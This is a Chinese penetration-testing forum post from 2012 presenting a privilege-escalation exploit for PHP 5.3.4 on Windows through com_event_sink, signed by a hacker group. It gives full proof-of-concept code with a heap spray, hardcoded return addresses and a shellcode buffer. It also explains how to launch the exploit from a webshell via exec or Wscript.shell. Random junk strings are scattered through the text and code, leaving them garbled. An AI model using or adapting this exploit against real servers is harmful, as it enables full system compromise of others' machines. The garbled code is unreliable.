中国网络渗透测试联盟

标题: PHP 5.3.4(WIN) COM_SINK权限提升漏洞 [打印本页]

作者: admin    时间: 2012-11-9 21:08
标题: PHP 5.3.4(WIN) COM_SINK权限提升漏洞
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
* R/ n' K" l6 f  W% C. r% X
* o6 f, ?. W, k! b* d测试方法如下:cmd /c x:\php\php.exe x:\test.php
% i) ]; H1 N# h/ e9 \$ N6 s1 C% q* v6 h# F4 a, s/ Q
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
2 ~  R5 J0 G4 B$ @1 N; }8 b这里是两个测试的截图:
( D  Q* i7 i6 d: K6 q4 I0 g% E
! {0 m/ M" I, `5 @1 y& A% F
% N# s  k$ N% O( ?) I
( D% B7 m. T+ D' ?+ j
& P) K3 W- r3 i$ |/ y( R$ g% u; i$ ]) y- d. T
成功利用此漏洞的攻击者将获得系统的最高权限
( M( K# x) j+ t
8 i0 j2 ?( p% T+ G, @- x: I# v" o. \7 T5 R( ]7 R
2 x3 I8 J6 J* @

2 X( P* c/ [2 J% n1 J" |7 \7 B, x* B4 k$ A7 c! s- W
关于漏洞分析稍后附上。一下是PoC代码:# I1 U3 s: f8 A8 C+ A1 z5 R
6 q) _' B# b3 _% T, u
<?php
: {0 ^' r9 i0 b9 b6 ~% P9 U# a//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞6 Y8 L0 x$ ~9 i% ~& G' Z- l
//$eip ="\x44\x43\x42\x41";9 J3 M! O3 R9 H
$eip= "\x4b\xe8\x57\x78";
( z; o$ ]5 H, q0 w' |: G, W$eax ="\x80\x01\x8d\x04";
% {" f1 s/ y% L. D/ M$deodrant="";7 L, P8 U1 E. H0 s* d6 U2 D+ s
$axespray = str_repeat($eip.$eax,0x80);. h, C9 A; M- m" \9 R1 p7 V# P: A
//048d0190+ }# u6 E7 W( Y- D+ d9 ]# ?) {
echo strlen($axespray);
% ^! \7 Z- F1 O; zecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";, C& ?2 a$ x' w; d2 \
echo "Silic Group Hacker Army - BlackBap.Org";4 K, i* x4 H4 I- V
//19200 ==4B32 4b00" i3 c0 w( o0 t6 f% m
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}% V( a& Y) m" T/ f$ D* e  ~* |
$terminate = "T";
- _0 e7 z4 O( F" B$u[] =$deodrant;
2 s" F5 W5 ?& D+ k3 Y$r[] =$deodrant.$terminate;* i3 ~- U8 c4 V' l2 A* a& O
$a[] =$deodrant.$terminate;4 n' r7 H* F+ s
$s[] =$deodrant.$terminate;# P1 d. t; x: D4 r# X% |
//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的9 `, k2 Y0 p2 p( V# t
$vVar = new VARIANT(0x048d0000+180);1 L" G2 B3 l  N1 S2 Q% f( [( {5 S. |# x
//弹窗代码(Shellcode)$ K! a% |; [" E( x* @
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";2 g9 \# w$ j, z
$var2 = new VARIANT(0x41414242);
- a3 h2 R8 s3 R$ ]. T& Jcom_event_sink($vVar,$var2,$buffer);6 n3 K! V5 {0 n4 g# c1 g
?>& r* b% Y6 d$ i$ `5 I
[attach]113[/attach][attach]114[/attach]




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2